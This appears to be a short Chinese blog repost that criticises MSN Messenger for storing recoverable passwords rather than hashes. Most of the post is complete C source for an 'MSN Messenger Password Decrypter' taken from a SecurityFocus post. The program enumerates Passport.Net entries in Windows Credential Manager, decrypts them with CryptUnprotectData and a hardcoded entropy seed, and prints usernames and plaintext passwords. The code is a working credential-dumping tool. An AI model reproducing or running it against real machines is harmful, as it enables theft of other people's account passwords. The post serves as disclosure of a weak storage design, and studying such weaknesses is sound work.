MSN Messager密码

 密码怎么能存下来呢，要存也存一个Hash以后的啊。失败，程序直接就找出密码来了。windows xp + vc++ 7.0下编译通过。

 #include <windows.h>
#include <wincrypt.h>
#include <stdio.h>

#pragma comment(lib, "Crypt32.lib")

//Following definitions taken from wincred.h
//[available only in Oct 2002 MS Platform SDK /

typedef struct _CREDENTIAL_ATTRIBUTEA {
 LPSTR Keyword;
 DWORD Flags;
 DWORD ValueSize;
 LPBYTE Value;
}
CREDENTIAL_ATTRIBUTEA,*PCREDENTIAL_ATTRIBUTEA;

typedef struct _CREDENTIALA {
 DWORD Flags;
 DWORD Type;
 LPSTR TargetName;
 LPSTR Comment;
 FILETIME LastWritten;
 DWORD CredentialBlobSize;
 LPBYTE CredentialBlob;
 DWORD Persist;
 DWORD AttributeCount;
 PCREDENTIAL_ATTRIBUTEA Attributes;
 LPSTR TargetAlias;
 LPSTR UserName;
} CREDENTIALA,*PCREDENTIALA;

typedef CREDENTIALA CREDENTIAL;
typedef PCREDENTIALA PCREDENTIAL;

////////////////////////////////////////////////////////////////////

typedef BOOL (WINAPI *typeCredEnumerateA)(LPCTSTR,
            DWORD, DWORD *, PCREDENTIALA **);
typedef BOOL (WINAPI *typeCredReadA)(LPCTSTR, DWORD,
          DWORD, PCREDENTIALA *);
typedef VOID (WINAPI *typeCredFree)(PVOID);

typeCredEnumerateA pfCredEnumerateA;
typeCredReadA pfCredReadA;
typeCredFree pfCredFree;

////////////////////////////////////////////////////////////////////

void showBanner()
{
 printf("MSN Messenger Password Decrypter for Windows XP/2003\n");
 printf(" - Gregory R. Panakkal,http://www.infogreg.com \n\n");
}

////////////////////////////////////////////////////////////////////
int main()
{
 PCREDENTIAL *CredentialCollection = NULL;
 DATA_BLOB blobCrypt, blobPlainText, blobEntropy;

 //used for filling up blobEntropy
 char szEntropyStringSeed[37] =
  "82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; //credui.dll
 short int EntropyData[37];
 short int tmp;

 HMODULE hDLL;
 DWORD Count, i;

 showBanner();

 //Locate CredEnumerate, CredRead, CredFree from advapi32.dll
  if( hDLL = LoadLibrary("advapi32.dll") )
  {
   pfCredEnumerateA =
    (typeCredEnumerateA)GetProcAddress(hDLL,
    "CredEnumerateA");
   pfCredReadA =
    (typeCredReadA)GetProcAddress(hDLL, "CredReadA");
   pfCredFree =
    (typeCredFree)GetProcAddress(hDLL, "CredFree");

   if( pfCredEnumerateA == NULL||
    pfCredReadA == NULL ||
    pfCredFree == NULL )
   {
    printf("error!\n");
    return -1;
   }
  }

  //Get an array of 'credential', satisfying the  filter
   pfCredEnumerateA("Passport.Net\\*", 0, &Count,
   &CredentialCollection);

  if( Count ) //usually this value is only 1
  {

   //Calculate Entropy Data
   for(i=0; i<37; i++) //    strlen(szEntropyStringSeed) = 37
   {
    tmp = (short int)szEntropyStringSeed[i];
    tmp <<= 2;
    EntropyData[i] = tmp;
   }

   for(i=0; i<Count; i++)
   {
    blobEntropy.pbData = (BYTE *)&EntropyData;
    blobEntropy.cbData = 74;
    //sizeof(EntropyData)

    blobCrypt.pbData =
     CredentialCollection[i]->CredentialBlob;
    blobCrypt.cbData =
     CredentialCollection[i]->CredentialBlobSize;

    CryptUnprotectData(&blobCrypt, NULL,
     &blobEntropy, NULL, NULL, 1, &blobPlainText);

    printf("Username : %s\n",
     CredentialCollection[i]->UserName);
    printf("Password : %ls\n\n",
     blobPlainText.pbData);
   }
  }

  pfCredFree(CredentialCollection);
}

出处：
http://www.securityfocus.net/archive/1/408425/30/0/threaded